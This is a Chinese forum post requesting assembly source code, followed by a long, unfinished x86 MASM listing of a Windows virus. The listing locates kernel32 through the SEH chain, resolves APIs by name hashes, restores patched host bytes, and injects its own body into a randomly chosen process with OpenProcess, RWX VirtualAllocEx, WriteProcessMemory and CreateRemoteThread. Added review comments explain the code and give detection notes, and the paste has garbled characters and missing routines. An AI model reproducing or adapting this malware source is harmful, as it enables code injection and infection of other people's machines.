求购Asm总源码

求购Asm总源码。有的朋友给留个言,或在下面回复给个连接也行。谢谢!
#
;****************************************************************************
; CRC16 <unused>, lstr
; Assembly-time hash of the literal lstr: a reflected CRC-32 (polynomial
; 0EDB88320h, initial and final xor 0FFFFFFFFh) folded one character at a
; time by IRPC/REPT, of which only the low 16 bits are emitted as one DW.
; The first parameter is unused; call sites pass it empty (`CRC16, Name`).
;****************************************************************************
CRC16 MACRO string, lstr
CRC_VALUE = 0ffffffffh
IRPC CRC_BYTE, lstr
CRC_VALUE = CRC_VALUE xor ‘&CRC_BYTE’ ; NOTE(review): the curly quotes are a paste artifact; presumably '&CRC_BYTE' in the source
REPT 8 ; one reflected-CRC step per bit of the character
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM ; REPT
ENDM ; IRPC
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dw (CRC_VALUE and 0ffffh) ; emit only the low 16 bits of the CRC-32
; NOTE(review): "ENDMAPIDEF" below is the ENDM that closes CRC16 run together
; with the header "APIDEF MACRO string, sym" of the next macro in the paste.
;****************************************************************************
; APIDEF <unused>, sym
; Emits the CRC16 of the API name sym and defines sym as the offset of that
; API's thunk: vEnd + VARLEN + APICOUNT. APICOUNT advances by 6, the size of
; the "push imm32 / ret" thunk that BuildImportTable writes per entry.
;****************************************************************************
ENDMAPIDEF MACRO string, sym
CRC16, sym
sym = vEnd + VARLEN + APICOUNT
APICOUNT = APICOUNT + 6
ENDM

;****************************************************************************
; VARDEF <unused>, sym, vw
; Defines sym as the current VARCOUNT offset and advances VARCOUNT by vw
; bytes, so successive invocations lay a variable block out sequentially.
; The first parameter is unused; call sites pass it empty (`VARDEF, name, 4`).
;****************************************************************************
VARDEF MACRO string, sym, vw
sym = VARCOUNT
VARCOUNT = VARCOUNT + vw
ENDM

;****************************************************************************
; LIBDEF <unused>, sym, lstr
; Emits lstr as a NUL-terminated byte string, defines sym as the current
; LIBCOUNT offset, and advances LIBCOUNT by the emitted length (l2 - l1,
; terminating NUL included). The first parameter is unused.
;****************************************************************************
LIBDEF MACRO string, sym, lstr
local l1, l2
l1:
db lstr, 0
l2:
sym = LIBCOUNT
LIBCOUNT = LIBCOUNT + (l2 – l1) ; NOTE(review): '–' is an en dash from the paste; presumably '-' in the source
ENDM

;****************************************************************************
; pushsz lstr
; Pushes the address of an inline NUL-terminated copy of lstr: the CALL
; pushes the address of the bytes that follow it, and execution resumes at
; the local label placed after the string.
;****************************************************************************
pushsz MACRO lstr
local pushstr
call pushstr
db lstr, 0
pushstr:
ENDM

;****************************************************************************
; rdtsc
; Emits the two-byte encoding of RDTSC (0F 31) directly; presumably the
; assembler in use does not know the mnemonic. Result is EDX:EAX.
;****************************************************************************
rdtsc MACRO
db 0fh, 31h
ENDM

;****************************************************************************
; ShowMessage lstr
; Debug-only trace. When DEBUG is nonzero it sets OUTPUTMESSAGE = 1, pushes
; the address of lstr via pushsz and calls OutputMessage (defined elsewhere);
; it expands to nothing when DEBUG is 0.
; NOTE(review): the invocation `pushsz, lstr` passes an empty first argument
; although pushsz declares a single parameter — verify against the assembler.
;****************************************************************************
ShowMessage MACRO lstr
IF DEBUG
OUTPUTMESSAGE = 1
pushsz, lstr
call OutputMessage
ENDIF
ENDM

;****************************************************************************
; WIN32_FIND_DATAA - record filled by FindFirstFile/FindNextFile (ANSI).
; The three FILETIME members are declared as QWORDs; with the assembler's
; default field alignment the offsets match the SDK layout.
;****************************************************************************
WIN32_FIND_DATAA STRUCT
dwFileAttributes DWORD ?
ftCreationTime QWORD ? ; FILETIME (64-bit)
ftLastAccessTime QWORD ? ; FILETIME
ftLastWriteTime QWORD ? ; FILETIME
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE 260 dup(?) ; MAX_PATH (104h)
cAlternateFileName BYTE 14 dup(?) ; 8.3 short name
ALIGN 4 ; pad the record to a 4-byte multiple
WIN32_FIND_DATAA ENDS
;****************************************************************************
; PROCESSENTRY32 - Toolhelp process snapshot record (ANSI, 32-bit: 296 bytes).
; dwSize must be set to SIZE PROCESSENTRY32 before Process32First (see
; EnumProcess). th32ProcessID and szExeFile are the fields EnumProcess reads.
;****************************************************************************
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ? ; ULONG_PTR, 4 bytes on 32-bit
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile BYTE 260 dup(?) ; MAX_PATH (104h)
PROCESSENTRY32 ENDS

;——————————————————–
DEBUG = 1 ; 1 = debug build: enables the IF DEBUG paths and ShowMessage
OUTPUTMESSAGE = 0 ; set to 1 by ShowMessage whenever a trace is emitted
VARLEN = 140h ; presumably the space reserved between vEnd and the API thunks (see APIDEF)
vSize = vEnd – vBegin ; byte length of the body copied by CreateVirusThread; NOTE(review): '–' is an en dash from the paste (also on the next line)
vdelta = vEnd + 80h
MAX_PATH = 104h ; 260
VARCOUNT = 0 ; running offsets for VARDEF / APIDEF / LIBDEF
APICOUNT = 0
LIBCOUNT = 0
MainLoaderSize equ 26 ; byte count of modifydata written back into the host
MiniLoaderSize equ 10
FILE_WRITE_ENABLE equ 00000001b ; presumably bits of var_flags — not used in this chunk
RING0_CODE_ALLOW equ 00000010b
USED_MINI_LOADER equ 00000100b
NTK_API_INIT equ 8
NTL_API_INIT equ 9
;****************************************************************************
; Global variable layout: each VARDEF assigns the next offset and advances
; VARCOUNT by the field size. The first group starts at -80h; the base
; register these offsets apply to is not shown in this chunk.
;****************************************************************************
VARCOUNT = -80h
VARDEF, var_k32base, 4
VARDEF, var_vbase, 4
VARDEF, var_temp1, 4
VARDEF, var_temp2, 4
VARDEF, var_temp3, 4
VARDEF, var_temp4, 4
VARDEF, var_flags, 4
VARDEF, var_fname, 4
VARDEF, var_ftime, 8
VARDEF, var_fsize, 8
VARDEF, var_fpatch, 4
VARDEF, var_hFile, 4
VARDEF, var_hMap, 4
VARDEF, var_pMem, 4
VARDEF, var_kfmap, 4
VARDEF, var_hostcall, 4
VARDEF, fun_random, 4
VARDEF, fun_knlxx, 4
VARDEF, var_voff, 4
VARDEF, var_vkey, 4
;——————————————————–
; Second group: three WNet* function slots at offsets 0, 4, 8.
VARCOUNT = 0
VARDEF, fun_WNetCloseEnum, 4
VARDEF, fun_WNetEnumResourceA, 4
VARDEF, fun_WNetOpenEnumA, 4
.DATA
;****************************************************************************
; 初始化
;****************************************************************************
;****************************************************************************
; vBegin - entry stub executed inside the infected host (no import table).
; As far as this chunk shows: saves the host context; walks the SEH chain to
; its last record and scans back from that handler for an MZ/PE header to
; obtain a kernel32 base; resolves the nine APIs listed after K32BaseValue by
; the CRC16 of their names into [ebp-40h .. ebp-20h]; writes MainLoaderSize
; bytes (modifydata) back to modifyaddr in the current process; then, on the
; low bit of the reseeded PRNG, either injects into a randomly chosen process
; (EnumProcess / OpenProcess / CreateVirusThread) or into the current one;
; finally returns to the host at the address stored in the saved EAX slot.
; Registers: EBX = 0 throughout; EDX = kernel32 base; EDI = hProcess.
; Detection note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
; WriteProcessMemory -> CreateRemoteThread issued from code that resolves its
; APIs by name hash is the canonical remote-thread-injection pattern that
; endpoint telemetry (ETW-TI / EDR) correlates and flags.
;****************************************************************************
vBegin:
push eax ; NOTE(review): push / add esp,4 / nop / nop prelude — purpose not evident from this chunk
add esp, 4
db 90h
db 90h
push eax ; slot later overwritten with the return-to-host address ([ebp+28h])
pushfd
pushad ; save the host context
enter 40h, 0 ; 40h-byte frame; [ebp-40h .. ebp-20h] receive the resolved API addresses
cld
xor ebx, ebx ; EBX = 0 for the rest of the stub
mov eax, fs:[ebx] ; head of the SEH chain
xchg esi, eax
lodsd
cmp eax, -1
jne $ – 5 ; follow Next links to the chain end (-1); NOTE(review): '–' is an en dash from the paste (also in the [ebp – xx] operands below)
mov edx, [esi] ; handler address of the last SEH record

FindK32Base:
dec edx
xor dx, dx ; step back to the previous 64 KiB boundary
cmp word ptr [edx], ‘ZM’ ; "MZ"
jne FindK32Base

mov eax, [edx + 3ch] ; e_lfanew
cmp dword ptr [edx + eax], ‘EP’ ; "PE"
jne FindK32Base

call PUSHINITDATA ; pushes the address of K32BaseValue
K32BaseValue dd 0 ; receives the module base found above
CRC16, CloseHandle ; -> [ebp-40h]
CRC16, CreateRemoteThread ; -> [ebp-3ch]
CRC16, CreateToolhelp32Snapshot ; -> [ebp-38h]
CRC16, OpenProcess ; -> [ebp-34h]
CRC16, Process32First ; -> [ebp-30h]
CRC16, Process32Next ; -> [ebp-2ch]
CRC16, VirtualAllocEx ; -> [ebp-28h]
CRC16, VirtualFreeEx ; -> [ebp-24h]
CRC16, WriteProcessMemory ; -> [ebp-20h]
db 00h ; end of the CRC16 list

PUSHINITDATA:
pop esi ; ESI -> K32BaseValue
mov [esi], edx
lodsd ; ESI -> CRC16 list
lea edi, [ebp – 40h] ; destination for the resolved addresses
call GetApiAddressFromList

call $ + 9 + MainLoaderSize ; pushes the address of modifyaddr and skips modifyaddr (4) + modifydata (26)
modifyaddr db 4 dup(?) ; address in the host that is written back
modifydata db MainLoaderSize dup(?) ; the bytes written there
pop esi
lodsd ; EAX = modifyaddr, ESI -> modifydata
mov [ebp + 28h], eax ; store the return-to-host address in the saved EAX slot

push ebx ; lpNumberOfBytesWritten = NULL
push MainLoaderSize ; nSize
push esi ; lpBuffer = modifydata
push eax ; lpBaseAddress = modifyaddr
push -1 ; hProcess = current process
call [ebp – 20h] ; WriteProcessMemory

rdtsc
call srand ; reseed the PRNG from the time-stamp counter (srand is not in this chunk)
and al, 1
jnz AttachCurrentProcess ; odd -> run in the current process

call EnumProcess ; EAX = a randomly chosen PID, 0 if none
push eax ; dwProcessId
push 0 ; bInheritHandle
push 1f0fffh ; PROCESS_ALL_ACCESS
call [ebp – 34h] ; OpenProcess
test eax, eax
jz AttachCurrentProcess ; could not open -> fall back to the current process
xchg edi, eax ; EDI = hProcess

call CreateVirusThread ; CF = 0 on success
pushfd ; keep CF across CloseHandle
push edi ; hProcess
call [ebp – 40h] ; CloseHandle
popfd
jnc ReturnHost

AttachCurrentProcess:
or edi, -1 ; hProcess = -1 (current process)
call CreateVirusThread

ReturnHost:
leave
popad
popfd
ret ; return to the host (address written at [ebp+28h] above)
;——————————————————–
;****************************************************************************
; EnumProcess - pick a random process ID from a Toolhelp snapshot.
; In:  EBP = caller's frame (API table at [ebp-40h ..]); copied to EBX
; Out: EAX = th32ProcessID of a randomly chosen entry, or 0 when the
;      snapshot yields none. The stack itself is used as the PID array:
;      one DWORD per process is pushed between ESI (frame top) and ESP.
; Clobbers: EAX, ECX, EDI, ESI, EBX. Relies on 'random' (not in this chunk)
;      to map EAX = count to an index in 0 .. count-1.
;****************************************************************************
EnumProcess:
mov ebx, ebp ; EBX = caller's frame base for the API table
enter size PROCESSENTRY32, 0 ; local PROCESSENTRY32 on the stack
mov esi, esp ; ESI -> PROCESSENTRY32; also marks the top of the PID array
push 0 ; th32ProcessID = 0 (original comment labelled this TH32CS_INHERIT)
push 2 ; TH32CS_SNAPPROCESS
call [ebx – 38h] ; CreateToolhelp32Snapshot; NOTE(review): '–' is an en dash from the paste (all [ebx – xx] operands here)
xchg edi, eax ; EDI = hSnapshot

mov [esi].dwSize, size PROCESSENTRY32 ; required before Process32First
push esi ; lppe
push edi ; hSnapshot
call [ebx – 30h] ; Process32First
xchg ecx, eax
jecxz NoProcessExist

GetNextProcess:
IF DEBUG
cmp dword ptr [esi].szExeFile, ‘eton’ ; debug build: keep only image names starting with "note"
jne $ + 5 ; jumps past the push that follows
ENDIF
push dword ptr [esi].th32ProcessID ; append this PID to the on-stack array
push esi ; lppe
push edi ; hSnapshot
call [ebx – 2ch] ; Process32Next
test eax, eax
jnz GetNextProcess

NoProcessExist:
push edi ; hSnapshot
call [ebx – 40h] ; CloseHandle
mov eax, esi
sub eax, esp ; EAX = bytes of PIDs pushed
jz EnumProcess_Return ; none -> return EAX = 0

shr eax, 2 ; EAX = number of PIDs
call random ; EAX = random index (random is not in this chunk)
mov eax, [esp + eax * 4] ; select one PID
mov esp, esi ; drop the array

EnumProcess_Return:
leave
ret
;——————————————————–
;****************************************************************************
; CreateVirusThread - copy the body [vBegin, vEnd) into process EDI and
; start it there as a remote thread.
; In:  EDI = hProcess (-1 = current process); EBP = frame with the API table
; Out: CF = 0 on success; CF = 1 on failure (the remote allocation is freed
;      when the write or the thread creation fails)
; Clobbers: EAX, EBX (remote base), ECX, EDX, ESI (= 0)
; Detection note: an RWX VirtualAllocEx followed by WriteProcessMemory and
; CreateRemoteThread into the same region is the injection triple that
; endpoint telemetry correlates; the region is private and not image-backed.
;****************************************************************************
CreateVirusThread:
xor esi, esi ; ESI = 0, reused for every NULL / 0 argument
xor eax, eax
push 40h ; flProtect = PAGE_EXECUTE_READWRITE
mov ah, 10h ; EAX = 1000h
push eax ; flAllocationType = MEM_COMMIT
mov ah, 50h ; EAX = 5000h
push eax ; dwSize = 20 KiB
push esi ; lpAddress = NULL
push edi ; hProcess
call [ebp – 28h] ; VirtualAllocEx; NOTE(review): '–' is an en dash from the paste (all [ebp – xx] operands here)
mov ebx, eax ; EBX = remote base
test eax, eax
jz CreateVirusThread_Return ; CF is set at the exit label

call $ + 5
pop eax ; EAX = address of this pop
sub eax, $ – vBegin – 1 ; EAX = runtime address of vBegin (the body to copy)

push esi ; lpNumberOfBytesWritten = NULL
push vSize ; nSize = vEnd - vBegin
push eax ; lpBuffer = vBegin
push ebx ; lpBaseAddress = remote base
push edi ; hProcess
call [ebp – 20h] ; WriteProcessMemory
xchg ecx, eax
jecxz CreateFailed ; ECX = 0 on that path; reused below for MEM_RELEASE

lea eax, [ebx + MyVirusStart – vBegin] ; thread entry = MyVirusStart relocated into the remote buffer (MyVirusStart is not in this chunk)
push esi ; slot that receives the thread id
push esp ; lpThreadId
push esi ; dwCreationFlags = 0
push ebx ; lpParameter = remote base
push eax ; lpStartAddress
push esi ; dwStackSize = 0
push esi ; lpThreadAttributes = NULL
push edi ; hProcess
call [ebp – 3ch] ; CreateRemoteThread
pop edx ; discard the thread-id slot
xchg ecx, eax
jecxz CreateFailed
clc ; success
ret

CreateFailed:
mov ch, 80h ; ECX = 8000h (ECX was 0 from jecxz)
push ecx ; dwFreeType = MEM_RELEASE
push esi ; dwSize = 0 (required with MEM_RELEASE)
push ebx ; lpAddress = remote base
push edi ; hProcess
call [ebp – 24h] ; VirtualFreeEx

CreateVirusThread_Return:
stc ; failure
ret
;****************************************************************************
; 获取API,生成调用转向表(ESI:API-CRC列表,EDI:写入地址,EDX:模块句柄)
;****************************************************************************
;****************************************************************************
; BuildImportTable - resolve a CRC16 API list and emit one "push imm32 / ret"
; thunk (6 bytes) per entry, building the table in place.
; In:  ESI -> list of 16-bit name CRCs terminated by a single 0 byte
;      EDI -> destination of the thunk table
;      EDX = module base (handle)
; Out: thunks at EDI; all registers restored (pushad/popad)
; GetApiAddressFromList first stores the resolved addresses at EDI + 2*n
; (n = entry count); the thunk loop then consumes them from there while
; writing thunks from EDI — each address is read before thunk bytes reach it.
; Assumes fewer than 128 entries: the count loop compares against CH = 0.
;****************************************************************************
BuildImportTable:
pushad
xor ecx, ecx
inc ecx
inc ecx ; ECX += 2 per CRC entry ...
cmp [esi + ecx], ch ; ... until the terminating 0 byte (CH must stay 0: < 128 APIs)
jne $ – 5 ; NOTE(review): '–' is an en dash from the paste (also in 'loop $ – 7' below)

add edi, ecx ; addresses go at EDI + 2*n
call GetApiAddressFromList
mov esi, edi ; ESI -> resolved addresses
sub edi, ecx ; EDI -> start of the thunk table
shr ecx, 1 ; ECX = entry count

mov al, 068h ; PUSH imm32 opcode
stosb
movsd ; imm32 = resolved address
mov al, 0c3h ; RET opcode
stosb
loop $ – 7 ; 7 bytes: mov al (2) stosb (1) movsd (1) mov al (2) stosb (1)
popad
ret
;——————————————————–
;****************************************************************************
; GetApiAddressFromList - resolve each CRC16 in a list against a module's
; export-by-name table and store the absolute function addresses.
; In:  ESI -> list of 16-bit CRCs of export names, terminated by one 0 byte
;      EDI -> output array of DWORD addresses (written with STOSD)
;      EDX = module base
; Out: addresses stored at EDI; all registers restored by popad
; EBP is used as the name index and is NOT reset between entries, so the CRC
; list must be in the module's export-name (sorted) order — the list after
; K32BaseValue is. vStrToCRC (not in this chunk) hashes the NUL-terminated
; name; only the low 16 bits are compared.
; NOTE(review): nothing bounds the index by NumberOfNames ([ebx+18h]); a CRC
; with no matching export walks past the table.
;****************************************************************************
GetApiAddressFromList:
pushad
mov ecx, [edx + 3ch] ; e_lfanew
add ecx, edx ; ECX -> IMAGE_NT_HEADERS
mov ebx, [ecx + 78h] ; DataDirectory[EXPORT].VirtualAddress
;ExportTableAddress
add ebx, edx ; EBX -> IMAGE_EXPORT_DIRECTORY
or ebp, -1 ; name index, pre-incremented below

SearchNextAPI:
mov ecx, [ebx + 20h] ; AddressOfNames (RVA)
add ecx, edx

ContinueSearch:
inc ebp
mov eax, edx
add eax, [ecx + ebp * 4] ; EAX -> export name string
call vStrToCRC
cmp [esi], ax ; compare the low 16 bits of the hash
jne ContinueSearch

mov eax, [ebx + 24h] ; AddressOfNameOrdinals
add eax, edx
movzx eax, word ptr [eax + ebp * 2] ; ordinal for this name
mov ecx, [ebx + 1ch] ; AddressOfFunctions
add ecx, edx
mov eax, [ecx + eax * 4] ; function RVA
add eax, edx
stosd ; store the absolute API address

inc esi
inc esi ; next CRC16 entry
cmp byte ptr [esi], 0 ; the list ends with a single 0 byte
jne SearchNextAPI
popad
ret
;****************************************************************************
system32

//未完//

 

 

 
